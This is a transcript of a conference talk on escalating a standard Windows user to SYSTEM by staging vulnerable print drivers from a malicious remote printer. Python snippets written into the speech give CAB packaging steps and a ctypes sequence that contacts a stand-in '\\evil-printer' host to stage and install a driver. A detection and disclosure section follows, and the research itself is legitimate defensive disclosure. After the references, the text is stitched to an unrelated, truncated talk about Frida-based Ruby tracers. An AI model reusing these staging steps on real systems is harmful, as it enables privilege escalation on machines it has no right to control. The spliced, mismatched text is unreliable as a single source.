probably my MikroTik work, although it isn't well known at all, but I have had the good fortune to be able to present at a few conferences, including DEF CON 27. I'm currently employed by Dragos. However, all the work I'm discussing today was done while I was employed by Dark Wolf Solutions in fall 2020. Dark Wolf very kindly gave me permission to share this work, for which I am truly grateful. So thank you very much to them. Now, there are some researchers that cut their own path and break new ground, but I'm just not one of those people. To learn the printer subsystem and arrive at the conclusions I did, I had to stand on the shoulders of many more talented researchers that came before me. I think it's important and useful to understand the work that influenced my final outcome. So let's quickly discuss some previous printer vulnerabilities. The first issue I want to familiarize you with is CVE-2019-19363. This is a vulnerability in a third-party print driver. The driver was developed by Ricoh, and it allows for privilege escalation to SYSTEM by overwriting a DLL. Pentagrid handled the disclosure and published a nice proof of concept, while Shelby Pace of Rapid7 developed the Metasploit module. It's a good vulnerability, but the driver has to be installed on the system in order to exploit it, so it is sort of limited in that capacity. This is a good one to remember for later in the talk, as we will reference it again. Of course, there is CVE-2020-1048, which is better known as PrintDemon. 
Now it got a lengthy and a bit of a meandering write up on the Windows Internals blog, but if you spend some time with it, that blog provides really good exposure to some of the important WinAPI function calls associated with printers. The vulnerability itself allows a local attacker to print to arbitrary files as system after restarting the spooler, resulting in privilege escalation. The image here is actually from the VoidSec blog that talks about the vulnerability. And what you see is the UI rejecting the attack due to insufficient permissions. However, a similar call via the WinAPI was allowed, resulting in the vulnerability. And of course there was the patch bypass for PrintDemon, a variety of people were actually credited with this CVE, but VoidSec did the best write up in my opinion. This is a really simple attack where after the file permission checks have been done, the attacker just swaps the file port with a junction, and then they just execute the normal PrintDemon attack. Really just that easy. I like Rapid7's AttackerKB because it's an easy way to get other attackers' thoughts on vulnerabilities. As you can see, CVE-2020-1337, still just a local privilege escalation, is rated as very high. Finally, CVE-2020-1300, or Evil Printer, was presented at DEF CON 28 last year. Again, this is a local privilege escalation using the printer subsystem, but this time via a CAB file delivered by a remote printer. ZDI wrote up some technical details about the CAB file, but other than Steven Seeley's tweet in November, I haven't seen anyone publish a full exploit for this one. Now I loved the DEF CON 28 presentation, and it served as the jumping off point for my own research. And because Evil Printer was so important to me and my thought process, I want to spend a few minutes just walking through the attack in its entirety. The attack setup requires two things, a standard user account on a Windows machine, and an Evil Printer to serve up a malicious CAB file. The standard user simply uses the add printer interface to connect to the Evil Printer, which triggers the CAB download and unpackaging. The CAB file contains a file path with a directory traversal that gets unpacked anywhere on the system the attacker would like, essentially allowing the attacker to plant a DLL or overwrite an executable to escalate to system. As Steven Seeley's tweet suggested, generation of a malicious CAB is actually quite easy. Here I generate a CAB file containing a file called UALAPI.DLL that, due to the path traversal, will get written to the System32 directory. Of course, UALAPI.DLL is a known missing DLL that an attacker can plant in order to escalate to system on reboot. And of course, if you're interested in recreating the CAB yourself, here's the source of the DLL I generated. Anyone familiar with Pentagrid's Ricoh exploit will know I basically stole the snippet from them, but either way, if you go to the linked repository, you'll find a project file that will compile the DLL. Obviously, this is nothing special or exciting. I just want to point out that this DLL executes whoami and writes the output to C:\result.txt. We will refer back to this throughout the talk. The more complicated part of the EvilPrinter attack is setting up the EvilPrinter. As I've suggested, this method is lifted entirely from last year's DEF CON presentation. Now for whatever reason, CutePDF Writer has implemented delivery of a CAB file to remote clients via package point and print.
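To make the traversal mechanic a bit more concrete, here is a small Python sketch that uses a ZIP archive as a stand-in, since the actual Windows CAB unpackaging is a different code path and this is only an analogy. The member name and directory names are made up for illustration; the point is just that a naive extractor that joins archive member names onto a destination directory will happily write outside of it.

    # Analogy only: shows why an archive entry named with "../" escapes its extraction
    # root when the extractor naively joins paths. The printer subsystem's CAB handling
    # is a different code path; this just illustrates the traversal idea.
    import io
    import os
    import zipfile

    # Build an in-memory archive whose single member carries a path traversal.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("../../escaped/payload.dll", b"not really a DLL")

    # A naive extractor that trusts member names.
    dest = os.path.abspath("extract_here")
    os.makedirs(dest, exist_ok=True)
    with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as zf:
        for name in zf.namelist():
            target = os.path.normpath(os.path.join(dest, name))
            print("would write:", target)  # resolves to a path outside of extract_here/

For what it's worth, Python's own ZipFile.extract tries to sanitize names like this, which is exactly the kind of check the CAB unpackaging was missing at the time.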
So we can rely on CutePDF Writer to do all of our heavy lifting. If you prepare a Windows box in your control with the steps in the slide, then you'll be ready to serve up malicious CAB files. The next step is the actual exploitation. As a standard low privilege user, use the Add Printer UI to connect to the EvilPrinter you just configured. When the attacker connects to the printer, the CAB file is downloaded and unpackaged, which means our malicious DLL gets dropped into System32. We also see this pop-up regarding installation of a driver, which requires administrator approval. However, at this point, our attack has already been successful. So we can just hit cancel. After rebooting the system, the UALAPI.DLL we dropped in System32 is loaded into a system process and executed. As you see, the result.txt created by the DLL contains the result of whoami, which, when the DLL was executed, was System. A successful privilege escalation and a really great attack in my opinion. It's only complicated by the requirement of an EvilPrinter, but in most attack scenarios, that shouldn't be a deal breaker. Like I said, there wasn't a public exploit for this, at least that I was aware of, so I've published my own. It's wrapped up into a tool that we'll talk about later, so I won't explain the silly name or how to use the exploit. We'll get there later. Just know a public exploit exists now, it's in the repository I mentioned earlier. So last fall, after this had been patched, I was exploring this attack surface, and I was thinking about this install driver prompt. I was interested if driver installation always required administrative rights, or if I could bypass that somehow. So I decided to spend some time learning how a standard, low privilege user can install a print driver on their system. But first we need to pick a driver that we would actually want to install. As an attacker, I'd love to install this vulnerable Ricoh driver that we talked about earlier. As a reminder, the vulnerability in this driver is a race condition to overwrite a DLL during the add printer call. But if timed correctly, a standard user can escalate to system. Now one of the requirements to add printer is of course the driver name the new printer will be using. Which is all well and good when the driver is available, like in this screenshot. The add printer call would be successful on this target. But when the driver isn't present, add printer will obviously fail. So it should be fairly obvious why I'm interested in finding ways to install the driver without needing administrator privileges. If I can trick the system into loading the driver somehow, then I can install the driver as a standard low privilege user and exploit the driver's vulnerability. An attack that I'd like to call bring your own print driver vulnerability. So how can a standard user try to install the vulnerable print driver? There are actually a surprising number of legitimate options. I listed a bunch here and we're going to quickly look at what happens when they're invoked by a standard user. First of all, thank you to Pentagrid for leaving links to the Ricoh installer in their blog. That did prove very helpful to me. The Ricoh installer for the vulnerable driver isn't so much an installer, but just right clicking on an INF file to invoke the INF install, which just so happens to require administrative rights. So that's not really all that useful for the standard user. Pointing the printer user interface at the INF file yields similar results.
So that's another no go for the standard user. The INF installer fails with a very ugly and sort of useless error message. However, looking up the command in MS documentation, we find this useful tidbit. The INF file should exist in the driver store. Well, what is that? Well, just hold on. We'll circle back to that. Invoking printui.dll yields the exact same result as just using the UI, which is about what you'd expect, so yet another failure for the standard user. And yet again, another failure when trying to use prndrvr.vbs. And while there are too many MS API functions for printers, PrintDemon specifically used InstallPrinterDriverFromPackage because a standard user could invoke it if, as highlighted here, the driver is in the driver store. So it seems like getting the print driver into the driver store would be really useful. How do we go about doing that? Well, let's talk about it. In this section, we'll finally see how to get the Ricoh driver onto the system as a standard user. A good place to start is, what is the driver store? The answer is that it's a trusted location on the system where signed and verified driver packages are stored. Adding a driver to the driver store is referred to as staging, likely so it isn't confused with installation. Staging a driver in the driver store is not the same as installing it. Only administrators can stage drivers. Probably the best tool for enumerating, adding, and removing drivers is the Plug and Play utility, pnputil. In this screenshot, the administrator adds the vulnerable Ricoh driver to the driver store. And once the vulnerable Ricoh driver is in the driver store, a standard low privilege user can install it while adding a new printer. Now, obviously, this talk is about a standard low privilege user adding a driver to the driver store and not an administrator, like in the previous slide. But I want to highlight how getting our driver into the driver store is all we need to be able to then exploit the Ricoh driver. So finally coming full circle, we sought to discover if a low privilege user can introduce arbitrary drivers to the system. We tested multiple methods of installing the vulnerable Ricoh driver and we checked out how the driver store works. Is there any way to stage a print driver as a standard low privileged user? And the answer, of course, is yes. A standard low privilege user can stage drivers into the driver store by connecting to a printer that uses package point and print, just like Evil Printer. The package, or cab file, if signed, will be staged in the driver store. So an attacker that controls an Evil Printer and a standard Windows account can stage drivers of their choosing. The client need only invoke the GetPrinterDriver MS API function. The printer responds with the driver and the system verifies the driver's integrity before finally dropping it into the driver store. It's really just that easy. So let's try it ourselves. We need to create a cab file for our vulnerable Ricoh driver. As we talked about earlier, the Ricoh installer just sort of left us this exploded directory. Well, we can roll all that up into a cab file using makecab. Obviously, the cab file we generate isn't signed. But fortunately for us, Windows doesn't care about that. When unpackaging the cab, the system will hunt out the security catalog that I've highlighted. The security catalog itself is signed by Microsoft Windows Hardware Compatibility Publisher. And the catalog contains hashes of each file that the driver needs.
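As an aside on the packaging step just described, here is a rough Python sketch of rolling an exploded driver directory back up with makecab. The directory and cabinet names are placeholders, and the DDF directives are written from memory rather than taken from the talk, so double-check them against the makecab documentation before relying on them.

    # Rough sketch: roll an exploded driver directory into a .cab with makecab.
    # Paths, names, and the exact DDF directives are assumptions to verify locally.
    import os
    import subprocess

    driver_dir = r"C:\drivers\ricoh"   # exploded driver files, .inf and signed .cat included
    ddf_path = os.path.join(driver_dir, "driver.ddf")

    lines = [
        ".Set CabinetNameTemplate=ricoh.cab",
        ".Set DiskDirectoryTemplate=.",   # write the cab into the working directory
        ".Set Cabinet=on",
        ".Set Compress=on",
    ]
    for root, _dirs, files in os.walk(driver_dir):
        rel = os.path.relpath(root, driver_dir)
        if rel != ".":
            # Keep the directory layout inside the cab so the INF's relative paths resolve.
            lines.append(f".Set DestinationDir={rel}")
        for f in files:
            if f.lower().endswith(".ddf"):
                continue
            lines.append(f'"{os.path.join(root, f)}"')

    with open(ddf_path, "w") as fh:
        fh.write("\n".join(lines) + "\n")

    subprocess.run(["makecab", "/F", ddf_path], check=True, cwd=driver_dir)

The thing that matters for the next part is that the vendor's INF and its signed security catalog ride along inside the cab.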
Now if you have sharp eyes, you might ask, does it matter if the valid-to date has expired? And the answer is no. The system doesn't care at all about that. So we've created a Ricoh cab that is cryptographically acceptable to the Windows printer subsystem. Now we just need to configure the evil printer just as we did earlier in the talk. I'll leave that as an exercise for home since it's the exact same setup we discussed before and I'll share a tool in a bit that automates all of that. Now once the evil printer is all set up, we can connect to it as a standard low privilege user via the Add Printer UI. If successful, we should see a new entry in the driver store. Here we've established our connection to the evil printer and I've highlighted our Ricoh driver staged in the driver store. The only downside here is that we've triggered Windows update. In a bit, we'll discuss how to avoid triggering the update and really the UI altogether. We can now see that our Ricoh driver is staged via the print UI. So a low privilege user can now use it to add a printer and most importantly, exploit it to achieve system. Now that's the whole thing, using a remote printer to stage drivers and exploiting the staged driver. Literally bring your own print driver vulnerability. Is this a vulnerability in Windows? Yes, I think so. As I just said, we clearly crossed the security boundary by adding a driver into the driver store and the result of crossing that security boundary is that we're able to escalate to system. Is this actually a vulnerability in Windows? No, it's a feature that's working as designed. This is exactly how printers are supposed to work. The system is supposed to automatically download and stage the package so that the user can add a new printer. And as we all know, features aren't vulnerabilities. We can dislike the feature and believe it's flawed, but at the end of the day, a feature really just isn't a vulnerability. But really, is this a vulnerability in Windows? I'd say honestly, I'm not sure and I'm not sure I really care all that much. I think both arguments are true. At the end of the day, I can escalate to system. You can call it a bug, you can call it a feature. The result is the same either way. Escalation to system. Is this useful? Of course. As long as you can establish a remote connection to an evil printer in your control, you can escalate to system. What's more, I'm not sure it's a patchable issue. It's working as designed and it works for Windows versions back to at least Windows 7. Maybe Vista, I actually didn't get a chance to try. What's more though, is it makes old or unlikely to be seen in the wild print drivers like Ricoh's really valuable, since now we can just pop them on the box at will and exploit them. So that's the entire concept. A standard user can add a print driver of their choosing and exploit it to obtain system privileges. But of course, no one wants to do that manually. So I've developed a tool that automates the process. The tool is called Concealed Position. So here's an early screenshot of the GitHub repo and a link. As of August 7th, this should be open to everyone. Now Concealed Position is developed in C++ and has three major components. The first is the server for configuring the evil printer. The second is the client for staging the driver and executing the privilege escalation. And finally, the DLL that gets executed with system privileges. Concealed Position currently has four exploits you can choose from.
Slashing damage and poison damage are the two we've already spoken about. Slashing damage is CVE-2020-1300 and poison damage is the Ricoh driver. But it also has two more vulnerable drivers that I found. And while recording this, I'm still in the middle of disclosing to the vendors, which we will talk about at the end of this talk. The first one is acid damage, which is a vulnerability in Lexmark's universal print driver. And the second is radiant damage, which is a vulnerability in Canon's TR150 print driver. Concealed Position can also be executed in a local only mode when the drivers already exist in the driver store. Now here's a sample screenshot of the server. And as you can see, it's simple to invoke. You just select the exploit you want to use. And the client is similar, except you need to either specify local exploitation or provide the evil printer address and the name of the evil printer you're going to connect to. And here's the tool after executing an attack using acid damage. Again, we see the DLL used. It just echoes whoami to the result.txt file you see pictured here. In one of the previous slides, we saw that connecting to the evil printer using the add printer UI triggered Windows update, which is obviously a no go during a real attack. By using the WinAPI calls listed in the slide, the client is able to avoid Windows update and the UI altogether. In the first stage, which is the connection to the remote printer, the attacker utilizes GetPrinterDriver. In the second phase, the driver is installed from the driver store using InstallPrinterDriverFromPackage. This sequence typically occurs during the add printer call. Now there's a lot of love for PowerShell out there, and I think it's the obvious tool for a lot of people. So some might wonder why I didn't develop Concealed Position in PowerShell. First of all, I just happen to love C++. It's really sort of the language that I think in first. But I think it's also good to know, if you do want to use PowerShell, that Add-Printer using a connection name will stage the driver into the driver store, but it also triggers Windows update as well. But if you like PowerShell, that's probably easy enough to work around. If you want to develop your own tooling, you should definitely pursue that. All right, so we've talked about the attack and I've showed off my tools. So let's talk about the new driver vulnerabilities that I found. The first one is acid damage. And like I said earlier, it's an issue with Lexmark's universal print driver affecting versions 2.15.1.0 and below. This has been assigned CVE-2021-35449. The issue is that during add printer, a world writable file is parsed for DLLs. An attacker can just insert a path traversal to a DLL under their control, resulting in escalation to system. Very, very simple. Now obviously the exploit has an implementation in Concealed Position, but I've also developed a Metasploit module for this as well. Now, the module doesn't use an evil printer, it's just a local only attack. However, one of the challenges with recording this so far in the past, like I said, I'm recording this in mid July, it's July 13. So the challenge here is that I can't really show an open pull request until August 7. So I can't link it here, but trust me, when the morning of August 7 rolls around, I will open that pull request. Now remember to use this attack with the evil printer, we need to generate a cab file. Now we can cheat and just download version 2.10.0.5 from the Windows Update catalog.
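For anyone who wants to poke at those two calls directly, here is a minimal ctypes sketch of the same GetPrinterDriver then InstallPrinterDriverFromPackage sequence. It is not how Concealed Position is implemented, just an illustration of the API pair; the printer share, driver name, and INF path are placeholders, error handling is mostly omitted, and whether the first call actually stages anything depends on the package point and print configuration discussed earlier.

    # Minimal sketch of the two winspool calls described above, via ctypes.
    # Printer share, driver name, and INF path are placeholders; real code needs
    # proper error handling and has to locate the staged INF under the driver store.
    import ctypes
    from ctypes import wintypes

    winspool = ctypes.WinDLL("winspool.drv", use_last_error=True)

    # Stage one: connect to the remote printer and ask for its driver, which is what
    # kicks off the package point and print download into the driver store.
    hprinter = wintypes.HANDLE()
    if not winspool.OpenPrinterW(r"\\evil-printer\FakePrinter", ctypes.byref(hprinter), None):
        raise ctypes.WinError(ctypes.get_last_error())

    needed = wintypes.DWORD(0)
    winspool.GetPrinterDriverW(hprinter, None, 3, None, 0, ctypes.byref(needed))  # size query
    buf = (ctypes.c_ubyte * max(needed.value, 1))()
    winspool.GetPrinterDriverW(hprinter, None, 3, buf, len(buf), ctypes.byref(needed))

    # Stage two: install the now-staged driver locally from the driver store.
    # HRESULT InstallPrinterDriverFromPackageW(server, infPath, driverName, environment, flags)
    inf_path = r"C:\Windows\System32\DriverStore\FileRepository\<package>\driver.inf"  # placeholder
    hr = winspool.InstallPrinterDriverFromPackageW(
        None, inf_path, "Vulnerable Driver Name", "Windows x64", 0
    )
    print("InstallPrinterDriverFromPackageW returned", hex(hr & 0xFFFFFFFF))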
So downloading it from the Windows Update catalog works fine, so why not? The cab file downloaded from the Windows Update catalog is also signed by Microsoft, so that's kind of a neat thing we can't recreate just by using makecab. But if you want to use the latest version, we can do that too. First we just have to grab the Lexmark installer, and it will dump the required files into C:\Lexmark. We can use the same technique as before, using dir to generate our files list. Except makecab doesn't respect directories unless you tell it to, so you have to modify the files.txt file to let makecab know that the driver needs the directory structure to be respected. But that's really it. Pass the modified files.txt to makecab, and we have a cab file to use with Concealed Position. Again, our generated cab file isn't signed, but it contains a valid security catalog. The next vulnerable driver, radiant damage, is an issue I discovered in the driver for Canon's Pixma TR150 mobile wireless printer. The TR150 driver 3.71.2.10 and below is affected. And again, this is a local privilege escalation during the add printer process. This issue has not been assigned a CVE at the time of recording, so I guess we'll discuss that in a bit. Similar to the Ricoh vulnerability, this is a race condition to overwrite a DLL in ProgramData. If you can time it correctly, the overwritten DLL will get picked up by the Print Isolation Host and executed as system. Again, very simple. I found that this is a bit difficult to time, a little bit harder than acid damage, but it usually takes no more than a couple of minutes to finally hit. Again, we need a cab file to work with the Concealed Position server. And again, you can actually download the TR150 driver from the update catalog. So we can simply download it and we have a signed, well-formed, most current version of a totally exploitable driver to use. Now, of course, it might be useful to know how to generate our own still. The Canon installer will download the following files into a directory in AppData. Note the flat file structure. Because of the flat file structure, it's trivial to package up using makecab. We just do exactly what we did for the Ricoh cab. And just like that, we generated our own correctly formed TR150 cab. Again, you can find the implementation of radiant damage at the following link. And again, there is a Metasploit module. I just couldn't include the link because I recorded so far in the past. So that's all for the exploitation sections. And I hope you find it interesting. But I now want to touch on detection and mitigation for those of us that have to defend against this sort of thing in the real world. Now my full time job is not defending. So these are best effort. Forgive me if I have overlooked anything obvious. So the first detection is from the event log. Event ID 600 is great for catching CVE-2020-1300, or what I call slashing damage, or what is known as the original Evil Printer. This is the path traversal presented last year at DEF CON. And you can even see that the description mentions that the failure can occur due to a bad or missing signature, which is exactly what the original Evil Printer serves up. Event 215 catches all the other issues, at least as I've coded them up. Here you can see the exploitation caused the printer driver to fail to install correctly during the add printer process. You can also investigate the setupapi.dev.log file in C:\Windows\INF.
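If you want to go hunting for those event IDs, something as simple as the following Python wrapper around wevtutil will pull recent hits. The channel names and IDs are worth validating in your own environment, since some PrintService channels are disabled by default and I am going off the IDs mentioned above.

    # Quick-and-dirty sketch: pull recent PrintService events 600 and 215 with wevtutil.
    # Channel names and event IDs should be double-checked locally; the Operational
    # channel in particular may be disabled by default in some environments.
    import subprocess

    channels = [
        "Microsoft-Windows-PrintService/Admin",
        "Microsoft-Windows-PrintService/Operational",
    ]
    xpath = "*[System[(EventID=600 or EventID=215)]]"

    for channel in channels:
        print(f"== {channel} ==")
        result = subprocess.run(
            ["wevtutil", "qe", channel, f"/q:{xpath}", "/f:text", "/c:20", "/rd:true"],
            capture_output=True, text=True,
        )
        print(result.stdout or result.stderr)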
Now that setupapi.dev.log file can be quite tedious to go through, as it's very verbose and quite long, but it's actually great documentation for any driver that has been introduced to the system, or even a driver that someone has attempted to introduce to the system. And of course, you can detect the attack over the wire as long as SMB encryption isn't enabled. The challenge here, of course, is that this attack uses totally legitimate behavior, although depending on your environment and where the evil printer is located, this might be a good way to detect the attack. For instance, it's probably a bad thing if one of your systems is reaching out to a printer over the internet. I've also embedded a unique string into Concealed Position's client. I chose the client because that's typically the victim system. So if you're using YARA or any other signature based system, you should be able to identify use of the CP client based on this string. Naturally, smart attackers are going to review the code I've written and remove this line. But there are a lot of dumb attackers out there too. So hopefully if this ever does get used in the wild, this will help stop that. One of the challenges with mitigations is I doubt this will ever see any real patch. Installing a printer is meant to use these mechanisms. I think the best you can do is just ensure that the affected drivers aren't on your systems already and then enable the package point and print approved servers GPO. Now of course, that will make it very difficult for your end users to add printers. That's sort of the entire issue, isn't it? Printers can't be trusted. And finally, I'd like to discuss the disclosures of the vulnerabilities and suggest some future work. So after getting my DEF CON acceptance and talking to Dark Wolf, I sent similar disclosures to Lexmark, Canon, and Microsoft. All were provided descriptions and exploit code. All very similar disclosures really. And they were all informed of the August 7th disclosure date. Excuse me. Lexmark was awesome. And this is exactly how you want disclosure to go. They acknowledged receipt immediately. I sent the disclosure on a Friday because I'm a monster and they confirmed the issue on a Monday. And it only took a little more than a week to send me a beta patch, which is really impressive. You can see at the end here that Lexmark intends to release a patch shortly after I record this talk. So by the end of the week of July 12. And Lexmark has been a great communicator overall. They even went as far as wishing me good luck on my DEF CON talk, which I never actually told them about, so that was, I thought that was pretty clever. So shout out to Graydon if you're listening. Now the only real problem with this disclosure is it took MITRE two weeks to assign a CVE, which is really frustrating from a researcher's point of view. Can they not move faster than that? They literally have two jobs, assigning and publishing CVEs that other people write. So how hard is that? Otherwise, great disclosure. Lexmark is awesome. So Canon and Lexmark were sent very similar content, to the point that I accidentally left the word Lexmark in a spot in my Canon disclosure. And disclosure with Canon started off very well. They asked clarifying questions on the affected component, but then nothing. As of July 9th, they had had the vulnerability for three weeks and they hadn't confirmed the issue. They haven't denied the issue. They didn't indicate if they tried the POC or if they'd even looked at the POC, even though I keep asking.
Now they did release a security patch on July 4th, but after looking at it, it doesn't affect the vulnerability I reported. And they for some reason didn't mention it to me until eight days later. But basically, I'm not sure where the confusion lies with Canon. They aren't giving me any type of feedback so that I can help them. And I think at some point I'll probably have to loop in CERT/CC so that this gets a CVE, hopefully by August 7th. But the Microsoft disclosure has been reasonable. As you can see from the timeline, there was a fair amount of back and forth about recreating the issue. But eventually, I guess the proof of concept video got there, which probably just means my written instructions weren't very good. Now while they did acknowledge the issue on July 12th, I actually don't expect any type of CVE here or security bulletin. Actually I just wanted Microsoft to be aware that this is a thing they designed into their system and that I'm going to talk about it on August 7th. So mission accomplished. But honestly, I'm not sure how they can address this without breaking normal printer workflows. I think it is very funny how these three different disclosures, they were all very similar content but they all had very different results. So one turned out good, one turned out bad, and one spent a lot of time stuck at can't-reproduce. So last slide, future work. Like I said, any print driver that is compatible with the driver store is fair game. New or old, really very old is even up for grabs here. So there are many drivers that could be analyzed and added to Concealed Position. There's also nothing special about CutePDF. It's only there because I couldn't get Samba to do what I wanted and didn't have the time to write my own implementation of delivering a package point and print cab file. Now hopefully in the future, I or someone else will code that up so that others can use an evil printer as they choose. Once that is done, this attack would be great paired with a USB attack. And finally, Concealed Position could use polishing. Like most exploits, it was written only to prove that the attack was possible. So it's a little messy at the moment and some of the mechanisms around dropping DLLs and customizing payloads could be extended. Otherwise, that's it. Thank you all so much for listening. Thank you very much to Dark Wolf for letting me share. And thank you again, DEF CON, for both the support and allowing me to present. Again, thank you all.
|
What can you do, as an attacker, when you find yourself as a low privileged Windows user with no path to SYSTEM? Install a vulnerable print driver! In this talk, you'll learn how to introduce vulnerable print drivers to a fully patched system. Then, using three examples, you'll learn how to use the vulnerable drivers to escalate to SYSTEM. REFERENCES: - Yarden Shafir and Alex Ionescu, PrintDemon: Print Spooler Privilege Escalation, Persistence & Stealth (CVE-2020-1048 & more) - https://windows-internals.com/printdemon-cve-2020-1048/ - voidsec, CVE-2020-1337 – PrintDemon is dead, long live PrintDemon! - https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/ - Zhipeng Huo and Chuanda Ding, Evil Printer: How to Hack Windows Machines with Printing Protocol - https://media.defcon.org/DEF CON 28/DEF CON Safe Mode presentations/DEF CON Safe Mode - Zhipeng-Huo and Chuanda-Ding - Evil Printer How to Hack Windows Machines with Printing Protocol.pdf - Pentagrid AG, Local Privilege Escalation in many Ricoh Printer Drivers for Windows (CVE-2019-19363) - https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/ - space-r7, Add module for CVE-2019-19363 - https://github.com/rapid7/metasploit-framework/pull/12906 - Microsoft, Point and Print with Packages - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/point-and-print-with-packages - Microsoft, Driver Store - https://docs.microsoft.com/en-us/windows-hardware/drivers/install/driver-store - Microsoft, Printer INF Files - https://docs.microsoft.com/en-us/windows-hardware/drivers/print/printer-inf-files - Microsoft, Use Group Policy settings to control printers in Active Directory - https://docs.microsoft.com/en-us/troubleshoot/windows-server/printing/use-group-policy-to-control-ad-printer
|
10.5446/54215 (DOI)
|
Hi and welcome to Instrument and Find Out, writing parasitic tracers for high-level languages. I'm Jeff, I'm at NCC Group. I like to hack on stuff and do various things; for the purposes of this talk, that means programs, languages, runtimes, memory, and bytes. But first up, please note that by viewing this presentation, you agree to indemnify and hold harmless the presenter in the event you decide to take any of his advice and find yourself unable to sleep at 4 in the morning due to language demons. So just as an outline of the structure of this talk, I'm going to talk about kind of the background of what led me to this work, what parasitic tracers are, how to kind of design them for tracing high-level language runtimes, looking at Ruby as a sort of case study, and then some concluding thoughts. So first about me, I've done a fair amount of work with dynamic instrumentation and tracing, from Java bytecode, various stuff in Android, Linux, both userland and in the kernel, through BPF. Generally, I do a lot of this stuff mostly for reversing and learning stuff and also to kind of script up existing things to do other things. So for dynamic instrumentation, just as a quick refresher, this generally means function hooking or instruction instrumentation, the latter of which mostly means that you kind of modify bytecode or assembly to be different bytecode or assembly to do something different, whereas with function hooking, generally you are doing something that hijacks control flow directly to go somewhere else. Dynamic tracing can refer to dynamically enabling or disabling existing logging functionality, but for our purposes, this mostly means adding enhanced logging functionality that wasn't there before. I've also been recently doing tracing with Frida for Ruby, which is what this talk is about. So, some background on Ruby and myself. A little while back, I had to do some Ruby bytecode transformation stuff and convert more modern bytecode to an older format, so translate newer opcodes into equivalent older ones so that a decompiler that only knew the older format would work. And that worked quite nicely for me at the time. More recently, a colleague and I were looking at Ruby's DRuby protocol. We were writing a scanner for it in Ruby, of all things. We gave a talk on this at NorthSec earlier this year. There were some weird issues that came up, and I spent a lot of time debugging this and going through the Ruby internals source code in C to find out that basically you don't want to call IO#read on a socket object, instead you want to just call recv. This led me to start writing this parasitic low-level Ruby tracer. What are parasitic tracers? What are tracers? A tracer is an enhanced logger that basically dumps everything you might want about program state, running code, et cetera. And a parasite is a highly specialized, unwanted organism that symbiotically lives off of, but inside of, another organism that it is completely adapted to. So a parasitic tracer is a combination of these two. It's basically a tracer that's specially adapted to the target process that it hooks onto and injects itself into and makes use of its internal functionality that wasn't really intended to be accessible. So the tracing part of this is just kind of the goal. I want to write a tracer for Ruby to better understand it. But the parasitic part is more of an implementation detail. You've sort of done this if you've ever used LD_PRELOAD to inject code into something.
So why would you write these things? Well, to get a better understanding of where the higher level abstractions meet the lower level implementations in, say, runtimes and things. So for reversing or debugging or just plain performance analysis. You could also be writing one of these things mostly to avoid having to maintain a fork of the actual code base, if you want to kind of maintain a tracer out of tree, because you can just do it on the process itself and not have to recompile it against the whole code base. So some examples of these parasitic tracers would be Frida's Java bridge API, which is actually arguably two of them. One for Android and one for the JVM itself. They provide basically an API for hooking into higher level Java operations, but in ways that weren't really intended to be allowed by the platform. So in Android, it's totally hooking the runtime. And for the JVM, it's using some of the JVM instrumentation APIs, but it's definitely doing stuff that doesn't involve those in weird ways. And so whereas a normal vanilla Java agent that uses those things wouldn't really qualify as a parasitic tracer because it's using kind of public APIs specifically for this purpose, the way that Frida does it is a little bit more invasive. But let's just say that if you're crawling around the memory of a process or intercepting its calls, chances are you just have a tracer, kind of like strace. But if you are hooking around in functions inside of the process itself or really calling functions from inside the process, then you're doing some parasitic stuff. So let's talk about designing these things for high level language runtimes. So first some prereqs. You're going to need some means to actually hook the code or instrument it, generally ideally one that allows you to kind of remove those hooks or re-add them at runtime. You could do this with a debugger and breakpoints, especially a scripted debugger. You could do this with an instrumentation toolkit like Frida, which is what I generally do these days. You will also need a way to invoke existing functionality that's in that code, in that process. So generally speaking, you do that with the debugger or with Frida. With a debugger, that would be something like the expression syntax for calling functions. But the thing is, you need to know what you're going to call. So the hierarchy of how you want to be preferring things is ideally public APIs that aren't going to change all that often, then internal APIs with symbols, then internal APIs that don't have symbols, but that you can get handles on fairly easily, say if the pointers to them are passed into other functions, you can just catch them there. Then after that, you're probably just going to want to opt for re-implementing stuff locally yourself. And then finally, all the way at the end, if you need to reuse existing code that's inside the process that you can't find a good way to get a handle on, you might need to just search for bytecode sequences and match on them. But moving on, the first step to owning a target is recon, and that is the first step to designing a parasitic tracer. You're going to need to be doing some reverse engineering, really to understand the internals of what it is you're going to be mucking around with. And as you do so, you'll learn more. But you may actually have source, like I was looking into Ruby, CRuby.
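As a tiny illustration of those two prerequisites, hooking something in the target and invoking functionality that already lives inside it, here is a minimal frida-python sketch. The process name is a placeholder, the libc exports are just convenient stand-ins, and Frida API details drift a little between versions, so treat it as a sketch rather than a recipe.

    # Minimal frida-python sketch of the two prerequisites above: hook something in the
    # target, and call something that already lives in the target. Uses Linux libc
    # exports as stand-ins; "target-process" is a placeholder.
    import frida

    js = r"""
    // Hook an export we know exists in the process.
    const openPtr = Module.findExportByName(null, 'open');
    Interceptor.attach(openPtr, {
      onEnter(args) {
        send('open(' + args[0].readUtf8String() + ')');
      }
    });

    // Invoke existing functionality inside the process: wrap getpid() and call it.
    const getpid = new NativeFunction(Module.findExportByName(null, 'getpid'), 'int', []);
    send('target pid according to itself: ' + getpid());
    """

    session = frida.attach("target-process")
    script = session.create_script(js)
    script.on("message", lambda msg, data: print(msg))
    script.load()
    input("tracing; press enter to detach\n")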
But even with source, you still need to know what's actually going on at the native level, especially with the way that your instrumentation itself works, because at that point, C doesn't really matter anymore. And optimizations can lead to weird situations where garbage values are sent to functions that don't process them anyway, and you need to be careful when handling those inputs, stuff like that. And then additionally, all of these kinds of runtimes heavily rely on implementation-defined behavior. And so you need to be really careful about how you're interacting with their code from your code. After that, you're going to want to identify all of the things that you're going to want to hook on or call into, to build up whatever it is you're going to get out of the runtime or the language. And then next is actually doing all of the hooking and calling of those things. So you're going to hook all that functionality, you're going to extract all the relevant state that you can get. You're going to start invoking, you know, function calls that are in the thing to get other pieces of data out of it, et cetera. And then after that, you're going to kind of bring it all together and orchestrate all that in what I like to call puppeteering. To bring together all your hooks, have them coordinate with one another, possibly be managed by some sort of injected thread or whatnot. At this point, you're mostly building up from there to have better interop between your own hooks and better interop with the actual platform you are messing around with. So in this case, for me, it was Frida, which is JavaScript. So basically a JavaScript to Ruby bridge more or less. So ideally you start small and build big. You compose 